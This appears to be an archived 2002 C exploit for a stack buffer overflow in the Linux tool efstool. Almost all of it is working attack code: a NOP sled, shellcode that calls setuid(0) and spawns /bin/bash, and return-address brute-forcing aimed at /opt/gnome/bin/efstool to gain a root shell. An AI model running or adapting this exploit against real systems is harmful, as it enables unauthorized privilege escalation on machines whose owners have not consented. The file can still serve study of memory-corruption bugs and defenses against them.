Efstool local root exploit for linux/x86 in C.
206195523043f6b384519ce939b2bf375c728b46e03b79ab11f2681c9fcb2a5c
/* efstool.c - efstool/bof simple overflow in efstool,
*
*
* This code is published propterty of CloudAss, you may
* duplicate this in any shape or form without prior written
* permission from CloudAss.
*
* Bug discovered by ntfx, just figured I'd code a decent
* exploit for it.
*
*
* DISCLAIMER - I am in no way affiliated with ntfx or any members of
* soldierx or legion2002 security.
*
* Usage: ./efsroot offset - bruteforce if neccesary
*
* Bug is pretty stupid, and simple, I have yet to see it give root.
* efstool is not +s on slackware 8.0 , it should spawn a shell
* regardless.
*
* (C) COPYRIGHT CloudAss , 2002
* all rights reserved
***********************************************************************
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"
//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/bash";
int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;
offset = atoi(argv[1]);
retaddr = get_esp() + offset;
for(i=0; i < SIZE; i+=4)
*(long *)&buffer[i] = retaddr;
for(i=0; i < strlen(shellcode); i++)
*(buffer+i) = NOP;
memcpy(buffer+i, shellcode, strlen(shellcode));
execl(PATH, "efstool", buffer, 12);
return 0;
}